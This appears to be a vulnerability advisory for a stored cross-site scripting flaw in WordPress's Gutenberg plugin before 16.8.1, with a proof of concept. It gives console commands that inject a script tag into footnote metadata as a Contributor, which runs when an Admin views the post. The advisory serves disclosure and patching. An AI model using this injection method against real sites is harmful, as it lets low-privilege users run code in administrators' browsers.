Gutenberg < 16.8.1 – Contributor+ Stored XSS

Description

The plugin does not adequately escape the content of the footnotes within the paragraph block of the block editor, leading to a Contributor+ Cross-Site Scripting vulnerability.

Proof of Concept

1. Create a new post as a Contributor user.
2. Add a paragraph block and add a footnote to the paragraph.
3. Open the developer console and execute the following code:

wp.data.select('core/editor').getEditedPostAttribute('meta');

You will see something like the following. Take note of the id.

{ footnotes: "[{\"content\":\"uuuuu\",\"id\":\"969d913a-9844-405e-8647-570d675fbeb6\"}]" }

4. Execute the following code on the console, using the id gathered above:

wp.data.dispatch('core/editor').editPost({meta:{...wp.data.select('core/editor').getEditedPostAttribute('meta'), footnotes:'[{\"content\":\"uuuuu<script>alert(\'ok\');</script>\",\"id\":\"969d913a-9844-405e-8647-570d675fbeb6\"}]'}});

5. As an Admin user, view the pending post at the following URL to trigger the XSS (filling in SITE_URL and POST_ID):

https://SITE_URL?id=POST_ID